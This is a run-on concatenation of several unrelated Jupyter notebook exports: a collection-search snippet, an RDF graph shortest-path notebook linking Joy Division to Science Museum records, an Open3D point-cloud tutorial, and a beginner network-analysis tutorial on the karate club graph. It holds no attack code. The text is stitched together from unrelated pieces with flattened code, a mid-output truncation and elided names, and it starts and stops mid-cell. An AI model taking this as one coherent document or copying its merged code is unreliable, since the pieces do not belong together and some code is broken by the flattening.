coll.apply_filters([coll.collection_core_fields,coll.drop_fields('EntryTitle')], raw_results) print("Found {} records.".format(len(clean_results))) for i in clean_results: print (i)Sortingdef sorted_search(params): results = coll.search(params, filters=[coll.collection_core_fields], limit=11) print("Found {} records.".format(len(results))) for i in results: print (i) #params = {'keyword':'modis', 'sort_key': 'instrument'} sorted_search({'keyword':'modis', 'sort_key': 'instrument'}) print('\nvs\n') sorted_search({'keyword':'modis', 'sort_key': '-instrument'})Help with Sort KeysIf you cannot remember the sort keys, look them up:coll.open_api("#sorting-collection-results")Getting HelpPrint out all the docstrings; you can filter by a prefix if you want.print(coll.print_help())Filtered Shortest PathFinding all the shortest paths between two nodes, using a filtered set of properties.*outstanding questions:*- can we order/filter these paths by 'uniqueness'? (e.g. connecting people because they are humans isn't that interesting!)!pip install networkx # Imports from rdflib import Graph from rdflib.extras.external_graph_libs import rdflib_to_networkx_graph import networkx as nx from networkx import Graph as NXGraph from networkx.algorithms.traversal.beamsearch import bfs_beam_edges from networkx.algorithms.shortest_paths.generic import all_shortest_paths from itertools import islice import matplotlib.pyplot as plt import statistics import collections import numpy as np from rdflib import URIRef, Literal import requests import json url = "https://d0rgkq.deta.dev/labels" def get_labels(entities): payload = json.dumps({ "uris": entities }) headers = { 'Content-Type': 'application/json' } return requests.post(url, headers=headers, data=payload).json() # RDF graph loading # This takes a while (10+ minutes). If you're working on a local machine it'll # be better to download the file from `path` below and give this notebook a # local path.
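# A possible caching step (a sketch; the local filename is an arbitrary choice): download the
# dump once with requests, then parse the cached copy on later runs instead of streaming it
# from S3 every time.
import os
local_path = "hc_dump_latest.nt"
if not os.path.exists(local_path):
    resp = requests.get("https://heritageconnector.s3.eu-west-2.amazonaws.com/rdf/hc_dump_latest.nt", stream=True)
    with open(local_path, "wb") as f:
        for chunk in resp.iter_content(chunk_size=1 << 20):
            f.write(chunk)
# rg = Graph(); rg.parse(local_path, format="nt")  # parse from disk instead of the remote URL below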
path = "https://heritageconnector.s3.eu-west-2.amazonaws.com/rdf/hc_dump_latest.nt" rg = Graph() rg.parse(path, format='nt') print("rdflib Graph loaded successfully with {} triples".format(len(rg))) # Optionally get a subgraph # Here we filter out all the triples with skos:hasTopConcept # one of ({OBJECT, PERSON or ORGANISATION}) and sdo:isPartOf (describes collection # membership for objects) properties = [ "hc:entityPERSON", "hc:entityORG", "hc:entityNORP", "hc:entityFAC", "hc:entityLOC", "hc:entityOBJECT", "hc:entityLANGUAGE", "hc:entityDATE", "sdo:birthDate", "sdo:deathDate", "sdo:foundingDate", "sdo:dissolutionDate", "foaf:maker", "foaf:made", "sdo:mentions", "owl:sameAs", "skos:related", "skos:relatedMatch", # "wdt:P101", # field of work "wdt:P1056", # "wdt:P106", # occupation "wdt:P127", "wdt:P135", "wdt:P136", "wdt:P137", "wdt:P1535", # "wdt:P17", # country "wdt:P176", "wdt:P18", "wdt:P180", "wdt:P20", # "wdt:P21", # sex or gender "wdt:P27", "wdt:P279", "wdt:P287", "wdt:P31", "wdt:P3342", "wdt:P452", # "wdt:P495", # country of origin "wdt:P607", "wdt:P61", "wdt:P710", "wdt:P749", "wdt:P793", "sdo:birthPlace", "sdo:deathPlace", ] query = f""" PREFIX owl: PREFIX skos: PREFIX sdo: PREFIX foaf: PREFIX xsd: PREFIX rdf: PREFIX rdfs: PREFIX smgp: PREFIX smgo: PREFIX smgd: PREFIX wd: PREFIX wdt: PREFIX hc: CONSTRUCT {{ ?s ?p ?o }} WHERE {{ ?s ?p ?o. FILTER (?p in ({", ".join(properties)})). }} """ print(query) subg = rg.query(query) # Conversion of rdflib.Graph to networkx.Graph if 'subg' in locals(): print("Using subgraph generated in last cell") G = rdflib_to_networkx_graph(subg) else: print("Using entire rdf graph") G = rdflib_to_networkx_graph(rg) print("networkx Graph loaded successfully with length {}".format(len(G)))Using subgraph generated in last cellShortest path# Joy Division to ent_a, ent_b = URIRef("http://www.wikidata.org/entity/Q172763"), URIRef("https://collection.sciencemuseumgroup.org.uk/people/cp127589") # to 'Vampire' aircraft # ent_a, ent_b = URIRef("http://www.wikidata.org/entity/Q56008"), URIRef("https://collection.sciencemuseumgroup.org.uk/objects/co8223281") all_sps = all_shortest_paths(G, ent_a, ent_b) path_graphs = [nx.path_graph(sp) for sp in all_sps] for idx, p in enumerate(path_graphs): print(f"Path {idx+1}") for idx, ea in enumerate(p.edges()): subj = ea[0] edges = [i[1] for i in G.edges[ea[0], ea[1]]['triples']] obj = ea[1] ent_labels = get_labels([e for e in ea if e.startswith("http")]) if idx +1 < len(p.edges()): print(f"- {ent_labels.get(str(subj)) or subj} -> {edges[0]}") else: print(f"- {ent_labels.get(str(subj)) or subj} -> {edges[0]}") print(f"- {ent_labels.get(str(obj)) or obj}")Path 1 - Joy Division -> http://www.wikidata.org/prop/direct/P31 - http://www.wikidata.org/entity/Q215380 -> http://www.wikidata.org/prop/direct/P31 - Kraftwerk -> http://www.heritageconnector.org/RDF/entityORG - Kraftwerk Uncovered -> http://www.heritageconnector.org/RDF/entityPERSON - Path 2 - Joy Division -> http://www.wikidata.org/prop/direct/P31 - http://www.wikidata.org/entity/Q215380 -> http://www.wikidata.org/prop/direct/P31 - Icebreaker -> http://www.heritageconnector.org/RDF/entityORG - Kraftwerk Uncovered -> http://www.heritageconnector.org/RDF/entityPERSON - Path 3 - Joy Division -> http://www.wikidata.org/prop/direct/P31 - http://www.wikidata.org/entity/Q215380 -> http://www.wikidata.org/prop/direct/P31 - Boomkat -> http://www.heritageconnector.org/RDF/entityORG - Oramics To Electronica Phase Two -> http://www.heritageconnector.org/RDF/entityPERSON - Path 4 - Joy 
Division -> http://www.wikidata.org/prop/direct/P136 - http://www.wikidata.[...]Point CloudThis tutorial demonstrates basic usage of a point cloud. Visualize point cloudThe first part of the tutorial reads a point cloud and visualizes it.print("Load a ply point cloud, print it, and render it") pcd = o3d.io.read_point_cloud("../../TestData/fragment.ply") print(pcd) print(np.asarray(pcd.points)) o3d.visualization.draw_geometries([pcd])`read_point_cloud` reads a point cloud from a file. It tries to decode the file based on the extension name. The supported extension names are: `pcd`, `ply`, `xyz`, `xyzrgb`, `xyzn`, `pts`.`draw_geometries` visualizes the point cloud. Use mouse/trackpad to see the geometry from different view point.It looks like a dense surface, but it is actually a point cloud rendered as surfels. The GUI supports various keyboard functions. One of them, the - key reduces the size of the points (surfels).**Note:** Press `h` key to print out a complete list of keyboard instructions for the GUI. For more information of the visualization GUI, refer to Visualization and Customized visualization. TODO links**Note:** On OS X, the GUI window may not receive keyboard event. In this case, try to launch Python with `pythonw` instead of `python`. Voxel downsamplingVoxel downsampling uses a regular voxel grid to create a uniformly downsampled point cloud from an input point cloud. It is often used as a pre-processing step for many point cloud processing tasks. The algorithm operates in two steps:1. Points are bucketed into voxels.2. Each occupied voxel generates exact one point by averaging all points inside.print("Downsample the point cloud with a voxel of 0.05") downpcd = pcd.voxel_down_sample(voxel_size=0.05) o3d.visualization.draw_geometries([downpcd])Vertex normal estimationAnother basic operation for point cloud is point normal estimation.Press n to see point normal. Key - and key + can be used to control the length of the normal.print("Recompute the normal of the downsampled point cloud") downpcd.estimate_normals(search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=30)) o3d.visualization.draw_geometries([downpcd], point_show_normal=True)`estimate_normals` computes normal for every point. The function finds adjacent points and calculate the principal axis of the adjacent points using covariance analysis.The function takes an instance of `KDTreeSearchParamHybrid` class as an argument. The two key arguments `radius = 0.1` and `max_nn = 30` specifies search radius and maximum nearest neighbor. It has 10cm of search radius, and only considers up to 30 neighbors to save computation time.**Note:** The covariance analysis algorithm produces two opposite directions as normal candidates. Without knowing the global structure of the geometry, both can be correct. This is known as the normal orientation problem. Open3D tries to orient the normal to align with the original normal if it exists. Otherwise, Open3D does a random guess. Further orientation functions such as `orient_normals_to_align_with_direction` and `orient_normals_towards_camera_location` need to be called if the orientation is a concern. Access estimated vertex normalEstimated normal vectors can be retrieved by `normals` variable of `downpcd`.print("Print a normal vector of the 0th point") print(downpcd.normals[0])To check out other variables, please use `help(downpcd)`. 
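To make the two voxel-downsampling steps described above concrete, here is a minimal NumPy-only sketch of the same idea; it assumes `pts` is an (N, 3) array of point coordinates and is not the Open3D implementation itself.
import numpy as np

def voxel_downsample_numpy(pts, voxel_size=0.05):
    """Illustrative sketch: average all points that share a voxel."""
    buckets = {}
    # 1. Bucket points into voxels by their integer grid coordinates.
    for p in pts:
        key = tuple(np.floor(p / voxel_size).astype(int))
        buckets.setdefault(key, []).append(p)
    # 2. Each occupied voxel contributes exactly one point: the mean of its members.
    return np.array([np.mean(v, axis=0) for v in buckets.values()])

# Example (assumes `pcd` from above): voxel_downsample_numpy(np.asarray(pcd.points), 0.05)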
Normal vectors can be transformed as a numpy array using `np.asarray`.print("Print the normal vectors of the first 10 points") print(np.asarray(downpcd.normals)[:10, :])Check Working with NumPy for more examples regarding numpy array. TODO link Crop point cloudprint("Load a polygon volume and use it to crop the original point cloud") vol = o3d.visualization.read_selection_polygon_volume("../../TestData/Crop/cropped.json") chair = vol.crop_point_cloud(pcd) o3d.visualization.draw_geometries([chair])`read_selection_polygon_volume` reads a json file that specifies polygon selection area. `vol.crop_point_cloud(pcd)` filters out points. Only the chair remains. Paint point cloudprint("Paint chair") chair.paint_uniform_color([1, 0.706, 0]) o3d.visualization.draw_geometries([chair])An Introduction to Network Analysis in Python**Author: ****Date: Jan 10, 2021** Networks are everywhere [N]etworks will dominate the new centruy to a much greater degree than most people are yet ready to acknowledge. (Barabasi, 2014, p.7) Networks are an integral part of our daily lives. Connections on Facebook, Twitter, or LinkedIn are networks of contacts and followers. Roads, railroads, metros, and flight routes form transportation networks. Goods and services are the result of buyer and supplier networks. Power and water are provided via complex networks of lines and pipes. Every day, we use these networks, often without thinking of them as “networks”—we ask friends for favors, travel to work, consume goods, and open the tap. Network analysis is the systematic study of the structures of these networks. It provides tools to answer questions such as: Which friend should I contact if I am looking for a job? What is the shortest way to get from Las Vegas to Rome? How can we prevent grid overload? This tutorial provides an introduction to network analysis in Python. It discusses key network concepts and their application in Python. The tutorial is aimed at beginners and deliberately limits use of mathematical formulas. The next section provides an introduction to the logic of network analysis. The following sections walk through an exemplary analysis. From Networks to Network Analysis Describing networks Networks are represented as sets of **nodes** or vertices (N) connected through sets of **edges** or ties (E), short G = (N, E). Nodes can be, for example, people, corporations, countries, airports, phones, and email addresses. Edges are the links between these nodes such as friendship between people, business transactions between corporations, migration between countries, flights between airports, and so on. Figure 1 shows a simple network of four people (nodes) connected by four links (edges). Edges from a node to itself such as when a person sends an email to herself are called **self-links**. While possible, these links are often excluded from analysis. Figure 1. Network of four people (nodes) connected by four links (edges). Edges can be directed or undirected and weighted or unweighted. **Directed** edges refer to relations that involve a directionality such as person A calling person B or a flight connection from city X to city Y. **Undirected** edges refer to relations without directionality such as having dinner together or collaborating on a project. **Weighted** edges are relations that can be quantified such as number of emails sent or amount of money given. **Unweighted** edges are relations that are not quantified such as being a friend or a co-worker. 
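To make these distinctions concrete, here is a small sketch (the names are illustrative) showing how each edge type can be created with NetworkX, the library used throughout this tutorial:
import networkx as nx

# Undirected, unweighted: a friendship between two people
g1 = nx.Graph()
g1.add_edge("Anna", "Ben")

# Undirected, weighted: e.g. number of projects worked on together
g2 = nx.Graph()
g2.add_edge("Anna", "Ben", weight=3)

# Directed, unweighted: Anna calls Ben
g3 = nx.DiGraph()
g3.add_edge("Anna", "Ben")

# Directed, weighted: Anna sent Ben 5 emails
g4 = nx.DiGraph()
g4.add_edge("Anna", "Ben", weight=5)

print(nx.is_directed(g3), nx.is_weighted(g4))  # True True
The karate club network analyzed below is of the simplest type: undirected and unweighted.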
Figure 2 shows the four different types of networks resulting from combinaions of these edge characteristics. Undirected, unweighted networks are the easiest to analyze. Therefore, if justifiable, other types of networks are often transformed to this type for analysis. Figure 2. Four different types of networks according to edge characteristics. Finally, on the network level, we differentiate unipartite vs. bipartite networks (see Figure 3 for a schematic overview). **Unipartite networks** are composed of one type of nodes and every node can, in principle, be connected to every other node. An example is a friendship network of people. In contrast, **bipartite networks** (also called two-mode data) are composed of two types of nodes with links only *between* but *not among* types. An example is attendance of parties by people. Here, nodes are parties and people with links only between people and parties (but not among parties or among people). Bipartite networks can be transformed into unipartite networks. For example, we can link people based on co-attendance of parties. Figure 3 provides a schematic representation of unipartite and bipartite networks. Figure 3. Unipartite vs. bipartite networks. Network Data Network data is commonly stored using edge lists or adjacency matrices (see Figure 4 for a schematic). **Edge lists** are sets of rows with every row representing an edge in the network. For directed networks, the first entry indicates the start and the second entry the end of an edge. An additional column may be added to indicate the strength (weight) of the edge. **Adjacency matrices** are matrices with nodes in the columns and rows. The entries in the matrix indicate presence (1) or absence (0) or strength (weight) of an edge. For directed networks, rows usually represent start and columns end of edges. The diagonal in an adjacency matrix shows self-links. Figure 4. Edgelist and adjacency matrix for network of four people. Analyzing Networks Now that we are familiar with the logic of network data, we will apply our new tool to analyze a real-world network of social contacts. The following sections walk through an exemplary analysis of the Karate Club network. The Karate Club network shows the social connections between members of a university karate club. Two members are linked in the network if they regularly interact *outside* of the karate club. The network data was collected by Zachary (1977) and is based on observations from 1970 to 1972. The data is included in the NetworkX library. Prepare the Network We start by loading the libraries and the network.# Import libraries import networkx as nx # for network analysis import pandas as pd # for easy data handling import numpy as np # for calculations from scipy.cluster import hierarchy # for dendrogram visualization import matplotlib.pyplot as plt # for graphs import seaborn as sns # for graphs # Load karate club data karate_club_net = nx.karate_club_graph()Next, we inspect the network.# Is the network directed? Weighted? print("Is the network directed?", nx.is_directed(karate_club_net)) print("Is the network weighted?", nx.is_weighted(karate_club_net)) # How many nodes and edges are in the network? print("Number of nodes: ", nx.number_of_nodes(karate_club_net)) print("Number of edges: ", nx.number_of_edges(karate_club_net)) print("Number of self-links: ", nx.number_of_selfloops(karate_club_net))Is the network directed? False Is the network weighted? 
False Number of nodes: 34 Number of edges: 78 Number of self-links: 0The network is undirected and unweighted. It consists of 34 nodes (club members) and 78 edges (social connections) with no self-links. Visualize the Network A network graph provides a first overview of a network and can help spot key characteristics visually. Here, we use NetworkX visualization tools (for other tools see nxviz and this Visualization Tutorial).# Visualize the network pos = nx.spring_layout(karate_club_net) # Define a layout. Other handy layouts: kamada_kawai_layout, circular_layout _ = nx.draw(karate_club_net, pos, edge_color='dimgrey', node_color= "coral", with_labels=True) plt.title("Visualization of the karate club network")*Note: If you follow this tutorial, your network might look slightly different. This is because placement of nodes is not predefined--there are many different ways to visualize this network.* The visualization reveals two interesting characteristics. First, nodes differ in the number of edges--some club members have many social connections while others have few. The nodes 0, 32, and 33 stand out as members with high numbers of connections. Second, the network seems to consist of two "subgroups." One subgroup forms around node 0 and another group around nodes 32 and 33. Explore the 'Whole' Network To describe the overall structure of a network, we can use the concepts component, isolate, and density. **Components** are unconnected parts of the network, or more formally: maximal sets of nodes that can reach each other (Borgatti, Everett, & Johnson, 2003, p.16). For example, a network consisting of two components essentally is two groups of nodes with links among members of each group but no links connecting the two groups. **Isolates** are nodes that have no connections (Borgatti, Everett, & Johnson, 2003, p.14). **Density** is the proportion of edges that could exist that actually does exist. This is best understood using an example. The karate club network has 78 edges—this is the number of links that “do exist.” Imagine, every member of the club was connected to every other member--this is the number of all possible links. For an undirected network like the karate club network, this number can be calculated by *n(n-1)/2* or *'n choose 2'* with n being the number of nodes in the network. In the karate club network, this would be (34*33)/2 = 561 possible edges. Accordingly, the density is 78 / 561 = 0.139.# Number of componenents print("Original network") print("Number of components: ", nx.number_connected_components(karate_club_net)) print("Number of isolates: ", nx.number_of_isolates(karate_club_net)) print("Density: ", nx.density(karate_club_net))Original network Number of components: 1 Number of isolates: 0 Density: 0.13903743315508021The karate club network consists of one component and has no isolates. Its density is 0.139, as calculated above. This means that 13.9% of all links that could exist--if every member was connected to every other member--do actually exist. Densitiy is sometimes interpreted as the probability that an edge exists between two randomly chosen nodes of the network (see Borgatti, Everett, & Johnson, 2003, pp.150-151). Accordingly, we could say that there is a 13.9% probability that any two members of the karate club socialize outside of club activities. It is important to note that there are no standards for low or high density. What is high or low depends on the context of the analysis, particularly the tpye of connections studied. 
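As a quick check of the arithmetic above, the same density can be computed by hand and compared with the value returned by `nx.density`:
# Density by hand: existing edges divided by all possible edges in an undirected network
n = nx.number_of_nodes(karate_club_net)      # 34
m = nx.number_of_edges(karate_club_net)      # 78
possible = n * (n - 1) / 2                   # 561
print(m / possible)                          # 0.1390..., matches nx.density above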
Also important to note is that density should be used with care when comparing networks of different size (for more detail see Borgatti, Everett, & Johnson, 2003, pp.150-151). Explore Individual Nodes To determine the role of an actor in a network, we use centrality measures. **Centrality measures** describe the position of a node in the network or its structural importance (Borgatti, Everett, & Johnson, 2013, p.164). We differentiate degree centrality, closeness centrality, and betweenness centrality. Figure 5 provides a schematic overview of these concepts. **Degree centrality** is the number of connections (edges) that a node has. For directed networks, we differentiate between outdegree centrality, i.e., the number of edges that start at the node, and indegree centrality, i.e., the number of edges that end at the node. Figure 5. Centrality measures for node F. Degrees can provide insights into network structures, beyond actor roles. A **degree distribution** is a histogram of the degrees of all nodes in a network. For many real-world networks, the degree distribution shows a distinct pattern: *many actors* have relatively *few connections* and *few actors* have relatively *many connections*. Figure 6 shows a typical real-world network and a comparable random network. In the random network, every connection is equally likely. This leads to a degree distribution that is roughly normal. In contrast, the degree distribution of the real-world network is right skewed. This is called a *power law distribution*, and such networks are called *scale free* (for explanations of the mechanisms behind this see Barabasi, 2014; Caldarelli et al., 2018; Bianconi & Barabasi, 2001). Figure 6. Degree distribution of a typical real-world network and a comparable random network. **Closeness centrality** is the sum of shortest distances (*geodesic distances*) from one node to all other nodes (Borgatti, Everett, & Johnson, 2013, p.173). Put simply, we calculate for a node how many steps it would take to reach each of the other nodes via the shortest path, and sum these step counts up. Based on this calculation, higher closeness centrality means that a node is more peripheral. It is important to note that many implementations such as NetworkX rescale the measure such that higher numbers indicate a node is more central and lower numbers indicate a node is more peripheral. Finally, **betweenness centrality** is the number of shortest paths (*geodesic paths*) that pass through a node. For every pair of nodes, we find the shortest path within the network. This is essentially what we did for calculating closeness centrality, but this time we do it for every pair of nodes in the network. Then, a node’s betweenness centrality is the number of these paths that the node is part of. Degree, closeness, and betweenness centrality measure different characteristics of the position of a node. Let’s look at an example. Imagine there is gossip in a network of people. A person with high degree centrality is likely to hear the gossip because there are many ways in which it can reach the person. A person with high closeness centrality (rescaled, with high meaning more central) can spread gossip effectively in the network because the person is “close” to everyone. Finally, a node with high betweenness centrality can decide if the gossip reaches different parts of the network; node F in Figure 5, for example, could decide if gossip from node C ever reaches node H.
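To see how the three measures can single out different nodes, here is a small sketch on a toy graph (the graph is illustrative and not part of the tutorial data):
import networkx as nx

# A small illustrative graph: B and D bridge the two halves
toy = nx.Graph([("A", "B"), ("C", "B"), ("B", "D"), ("D", "E"), ("D", "F"), ("E", "F")])

print(nx.degree_centrality(toy))       # B and D have the most connections
print(nx.closeness_centrality(toy))    # B and D are "closest" to everyone else
print(nx.betweenness_centrality(toy))  # B and D sit on the most shortest paths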
Libraries differ in the implementation of these measures in terms of two key aspects: (1) The first relates to absolute vs. normalized values. Many libraries such as NetworkX normalize the measures by network size. (2) The second relates to implementation for unconnected networks (i.e., networks with more than one component). Closeness and betweeness centrality can technically not be computed for networks with multiple components because some nodes cannot reach other nodes. Many libraries such as NetworkX compute these measures for connected parts separately.# Degree centrality degree = nx.degree_centrality(karate_club_net) degree = pd.DataFrame.from_dict(degree, orient='index', columns = ["Degree centrality"]) # Turn into pd df for easier display print("Club memberss with highest degree centrality (normalized):") print(degree.sort_values("Degree centrality", ascending = False).head(5))Club memberss with highest degree centrality (normalized): Degree centrality 33 0.515152 0 0.484848 32 0.363636 2 0.303030 1 0.272727As noted above, NetworkX provides normalized centrality measures. The normalized version shows the share of other actors that a member is connected to. Hence, member 33 is connected to roughly 52% of all other actors in the network. This indicates a highly central position. To get the non-normalized degree centrality, we need to multiply the normalized degrees by *number of nodes - 1*.degree["Degree centrality"] = degree["Degree centrality"] * (nx.number_of_nodes(karate_club_net) - 1) print("\nClub memberss with highest degree centrality (absolute):") print(degree.sort_values("Degree centrality", ascending = False).head(5))Club memberss with highest degree centrality (absolute): Degree centrality 33 17.0 0 16.0 32 12.0 2 10.0 1 9.0Next, we explore the degree distribution.# Degree distribution _ = sns.distplot(degree["Degree centrality"], bins = 15) _.set_xlim(0, 20) _.set_ylabel("Frequency (in percent)") _.set_title("Degree distribution of the Karate Club Network")The degree distribution of the karate club network shows the power law distribution common for real-world network. Most club members have relatively few social connectsion and few club members have relatively many connections.# Closeness centrality closeness = nx.closeness_centrality(karate_club_net) closeness = pd.DataFrame.from_dict(closeness, orient='index', columns = ["Closeness centrality"]) # Turn into pd df for easier display print("Club members with HIGHEST closeness centrality:") print(closeness.sort_values("Closeness centrality", ascending = False).head(5)) # Betweenness centrality betweenness = nx.betweenness_centrality(karate_club_net) betweenness = pd.DataFrame.from_dict(betweenness, orient='index', columns = ["Betweenness centrality"]) # Turn into pd df for easier display print("\nClub members with highest betweenness centrality:") print(betweenness.sort_values("Betweenness centrality", ascending = False).head(5))Club members with HIGHEST closeness centrality: Closeness centrality 0 0.568966 2 0.559322 33 0.550000 31 0.540984 13 0.515625 Club members with highest betweenness centrality: Betweenness centrality 0 0.437635 33 0.304075 32 0.145247 2 0.143657 31 0.138276*Note: These are the normalized versions. Closeness centrality is rescaled such that higher numbers indicate more central positions.* The club members 0 and 33 are high on all three centrality measures. This conforms with our earlier observation based on the graph. These nodes represent the karate trainer Mr. Hi (0) and the club president . 
(33). The high centrality of these members across all measures and the "clustering" of the network around them are interesting. The likely reason is a conflict between Mr. Hi and the club president, as described by Zachary (1977). Zachary (1977) reports a disagreement taking place at the beginning of his observation period. Mr. Hi attempted to raise the price of karate lessons. The club president objected to this. Over time, the club became divided over the issue. The club meeting was a central place where these differences were negotiated. Zachary explains: > *During the factional confrontations […], the club meeting remained the setting for decision making. If, at a given meeting, one faction held a majority, it would attempt to pass resolutions and decisions favorable to its ideological position. The other faction would then retaliate at a future meeting when it held the majority, by repealing the unfavorable decisions and substituting ones favorable to itself. Thus, the outcome of any crises was determined by which faction was able to 'stack' the meetings most successfully. (Zachary, 1977, p.453)*The importance of mobilizing supporters may explain the centrality of the two actors. Looking at Subgroups So far, our observation of subgroups around Mr. Hi and the club president is based on visual inspection of the network. This final part introduces a method to systematically identify subgroups. **Communities** are cohesive and mutually exclusive subgroups in a network (Borgatti, Everett, & Johnson, 2013, p.195). A common way to detect communities is through the Girvan-Newman algorithm (see Figure 7 for a schematic overview). The algorithm systematically disconnects the network. Edges are removed based on edge betweenness. Similar to betweenness centrality of nodes, edge betweenness measures how many shortest paths go through an edge. The algorithm iteratively removes the edge or edges with the highest edge betweenness until no edges are left. The step-wise disconnection can be shown as a dendrogram. Figure 7. Overview of Girvan-Newman algorithm. The community membership can be used as a node attribute. **Node attributes** are characteristics of nodes. They can be numerical or categorical. Examples are the sex of an actor, the sector of a corporation, the population of a country, or community membership in the network. Node attributes can be used in visualizations or in more advanced network models.# Applying the Girvan-Newman algorithm communities_generator = nx.community.girvan_newman(karate_club_net) print(communities_generator)NetworkX provides a generator object or "lazy iterator" that we can iterate through to see the step-wise disconnection of the network.# Show top level community print("Top level communities") print(next(communities_generator)) # Show second level community print("\nSecond level communities") print(next(communities_generator)) # Show bottom level community (leaves) print("\nBottom level communities") print(max(enumerate(communities_generator))[1])Top level communities ({0, 1, 3, 4, 5, 6, 7, 10, 11, 12, 13, 16, 17, 19, 21}, {2, 8, 9, 14, 15, 18, 20, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33}) Second level communities ({0, 1, 3, 4, 5, 6, 7, 10, 11, 12, 13, 16, 17, 19, 21}, {32, 33, 2, 8, 14, 15, 18, 20, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31}, {9}) Bottom level communities ({0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}, {10}, {11}, {12}, {13}, {14}, {15}, {16}, {17}, {18}, {19}, {20}, {21}, {22}, {23}, {24}, {25}, {26}, {27}, {28}, {29}, {30}, {31}, {32}, {33})In the first step, the network is split into two communities.
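For intuition about which edges the algorithm removes first, the edge betweenness values can be inspected directly; this is an optional sketch and not part of the original walkthrough:
# Edges with the highest betweenness are the "bridges" that Girvan-Newman cuts first
edge_btw = nx.edge_betweenness_centrality(karate_club_net)
print(sorted(edge_btw.items(), key=lambda kv: kv[1], reverse=True)[:5])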
The first community contains 15 and the second 19 club members. In the next step, the network is split into three communities. One communities consists of node 9 only. If we continue, we will eventually have 34 communities with every node forming its own community. NetworkX does not (yet) contain a tool to visualize community detection as dendogram. The following function creates a linkage matrix Z that can then be visualized as dendrogram using scipy. The function makes certain assumptions--hence, it needs to be used with care.# Load function def communities_linkages_matrix(communities_generator): """ Create linkages matrix Z for visualization of network communities as dendrogram using scipy.cluster.hierarchical.dendrogram. Input: communities_generator: Communities generator created by nx.community.girvan_newman Output: Linkages matrix Z as np.array Asumptions: Function works on simple structure. It assumes that every node in the dendrogram has only two children. It assumes equal distances of length 1 between subsequent nodes in the dendrogram. """ communities_list = list(reversed(list(communities_generator))) d = {} # empty dictionary t = [i for i in communities_list[0]] # leaves i = 0 # iterator for naming newly created communities h = 1 # iterator for node height, assuming equal height for pairing # Create dictionary with keys cluster and values cluster number for community in t: d[str(community)] = i i += 1 # Get linkages matrix Z Z = [] # empty list Z for j in range(1, len(communities_list)): # Find "old" communities that were merged into a "new" community old = [c for c in communities_list[j-1] if c not in communities_list[j]] new = [c for c in communities_list[j] if c not in communities_list[j-1]] # Append information to Z: Child 1, child 2, height of merger, length of new cluster Z.append([np.float(d[str(old[0])]), np.float(d[str(old[1])]), np.float(h), np.float(len(new[0]))]) # Update dictionary: Remove old clusters and add new cluster del d[str(old[0])] del d[str(old[1])] d[str(new[0])] = i # New cluster gets a new number # Update h and i h += 1 i += 1 # Add the highest level: All nodes in once cluster Z.append([np.float(list(d.values())[0]), np.float(list(d.values())[1]), np.float(h), np.float(len(communities_list[0]))]) # Turn Z into the right format Z = np.array(Z) np.flip(Z, 0) return Z # Apply function to create linkages matrix communities_generator = nx.community.girvan_newman(karate_club_net) Z = communities_linkages_matrix(communities_generator) # Plot the dendrogram usind scipy plt.figure(figsize=(10,5)) dendrogram = hierarchy.dendrogram(Z) plt.title("Dendrogram of communities for the karate club network") plt.show()The dendrogram shows two main communities, one containing Mr. Hi and the other . Each of the two communities consists of several sub-communities. Node 9 is a special case. It is not clearly associated with either of the two main communities. Let's next visualize different community solutions. The following function allows us to extract community membership as dictionary.# Function to extract community membership as dict def community_member_dict(communities_generator, num_communities): """ Get a dictionary showing community membership of nodes based on a community generator and for a specified number of communities. 
Input: communities_generator: Communities generator object created by nx.community.girvan_newman num_communities: Number of communities to be extracted Output: Dictionary with node as key and community as value """ partition = [x for x in list(communities_generator) if len(x) == num_communities][0] attribute_dict = {} for community in range(num_communities): for node in [node for node in partition[community]]: attribute_dict[node] = community return attribute_dictWe apply this function to extract two, three, and five community solutions. We then use the community membership as node attribute and plot the network graph with the nodes colored according to community membership.# Extract 2 communities solution and add it as node attributes communities_generator = nx.community.girvan_newman(karate_club_net) two_communities = community_member_dict(communities_generator, 2) nx.set_node_attributes(karate_club_net, two_communities, "two_communities") # Extract 3 communities solution and add it as node attributes communities_generator = nx.community.girvan_newman(karate_club_net) three_communities = community_member_dict(communities_generator, 3) nx.set_node_attributes(karate_club_net, three_communities, "three_communities") # Extract 5 communities solution and add it as node attributes communities_generator = nx.community.girvan_newman(karate_club_net) five_communities = community_member_dict(communities_generator, 5) nx.set_node_attributes(karate_club_net, five_communities, "five_communities") # Plot the networks plt.figure(figsize=(18,5)) plt.subplot(1, 3, 1) _ = nx.draw(karate_club_net, pos, edge_color='dimgrey', node_color= list(nx.get_node_attributes(karate_club_net,'two_communities').values()), with_labels=True, cmap=plt.cm.Set1) plt.title("Two communities") plt.subplot(1, 3, 2) _= nx.draw(karate_club_net, pos, edge_color='dimgrey', node_color= list(nx.get_node_attributes(karate_club_net,'three_communities').values()), with_labels=True, cmap=plt.cm.Set1) plt.title("Three communities") plt.subplot(1, 3, 3) _ = nx.draw(karate_club_net, pos, edge_color='dimgrey', node_color= list(nx.get_node_attributes(karate_club_net,'five_communities').values()), with_labels=True, cmap=plt.cm.Set1) plt.title("Five communities")C:\Users\Lena\Anaconda3\lib\site-packages\networkx\drawing\nx_pylab.py:579: MatplotlibDeprecationWarning: The iterable function was deprecated in Matplotlib 3.1 and will be removed in 3.3. Use np.iterable instead. if not cb.iterable(width):*Note: You may find the above code more complicated than code suggested in some forums. A key issue in plotting node attributes is to ensure that they are in the right order. The above code, while slightly more complicated, helps mitigate problems related to order.* As mentioned earlier, Zachary reports a conflict at the beginning of the oberservation period between (node 0) and . (node 33). This conflict effentually led to the splitting of the club and the creation of two independent organizations, one forming around and the other around . Club membership after the fission is stored as the node attribute "club". In our final graph, we will color nodes according to club membership after the fission and compare the results to our community solutions.# Inspect the node attribute "club" list(nx.get_node_attributes(karate_club_net,'club').items())[:3] # The node attribute is given as string. We need it to be a numeric value. 
